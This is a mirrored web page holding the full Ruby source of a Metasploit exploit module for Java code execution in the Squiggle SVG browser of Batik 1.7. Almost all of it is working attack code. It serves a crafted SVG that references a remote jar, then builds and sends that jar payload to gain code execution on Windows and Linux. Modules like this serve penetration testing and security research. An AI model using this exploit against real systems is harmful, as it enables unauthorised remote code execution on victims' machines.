CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
Path: blob/master/modules/exploits/multi/misc/batik_svg_java.rb
Views: 1904
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Remote6Rank = ExcellentRanking78include Msf::Exploit::Remote::HttpServer::HTML910def initialize(info={})11super(update_info(info,12'Name' => "Squiggle 1.7 SVG Browser Java Code Execution",13'Description' => %q{14This module abuses the SVG support to execute Java Code in the15Squiggle Browser included in the Batik framework 1.7 through a16crafted SVG file referencing a jar file.1718In order to gain arbitrary code execution, the browser must meet19the following conditions: (1) It must support at least SVG version201.1 or newer, (2) It must support Java code and (3) The "Enforce21secure scripting" check must be disabled.2223The module has been tested against Windows and Linux platforms.24},25'License' => MSF_LICENSE,26'Author' =>27[28'Nicolas Gregoire', # aka @Agarri_FR, Abuse discovery and PoC29'sinn3r', # Metasploit module30'juan vazquez' # Metasploit module31],32'References' =>33[34['OSVDB', '81965'],35['URL', 'http://www.agarri.fr/blog/']36],37'Payload' =>38{39'Space' => 20480,40'BadChars' => '',41'DisableNops' => true42},43'DefaultOptions' =>44{45'EXITFUNC' => 'thread'46},47'Platform' => %w{ java linux win },48'Targets' =>49[50[ 'Generic (Java Payload)',51{52'Arch' => ARCH_JAVA,53}54],55[ 'Windows Universal',56{57'Arch' => ARCH_X86,58'Platform' => 'win'59}60],61[ 'Linux x86',62{63'Arch' => ARCH_X86,64'Platform' => 'linux'65}66]67],68'Privileged' => false,69'DisclosureDate' => '2012-05-11',70'DefaultTarget' => 0))7172end7374def on_request_uri(cli, request)7576agent = request.headers['User-Agent']77jar_uri = ('/' == get_resource[-1,1]) ? get_resource[0, get_resource.length-1] : get_resource78jar_uri << "/#{rand_text_alpha(rand(6)+3)}.jar"79rand_text = Rex::Text.rand_text_alphanumeric(rand(8)+4)8081if request.uri =~ /\.jar$/82paths = [83[ "Exploit.class" ],84[ "Exploit$1.class"],85[ "META-INF", "MANIFEST.MF"]86]8788p = regenerate_payload(cli)8990jar = p.encoded_jar91paths.each do |path|921.upto(path.length - 1) do |idx|93full = path[0,idx].join("/") + "/"94if !(jar.entries.map{|e|e.name}.include?(full))95jar.add_file(full, '')96end97end9899fd = File.open(File.join( Msf::Config.data_directory, "exploits", "batik_svg", path ), "rb")100data = fd.read(fd.stat.size)101jar.add_file(path.join("/"), data)102fd.close103end104105print_status("#{cli.peerhost} - Sending jar payload")106send_response(cli, jar.pack, {'Content-Type'=>'application/java-archive'})107108elsif agent =~ /Batik/109svg = %Q|110<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.0">111<script type="application/java-archive" xlink:href="#{jar_uri}"/>112<text>#{rand_text}</text>113</svg>114|115116svg = svg.gsub(/\t\t\t/, '')117print_status("#{cli.peerhost} - Sending SVG")118send_response(cli, svg, {'Content-Type'=>'image/svg+xml'})119120else121print_error("#{cli.peerhost} - Unknown client request: #{request.uri.inspect}")122end123end124end125126127128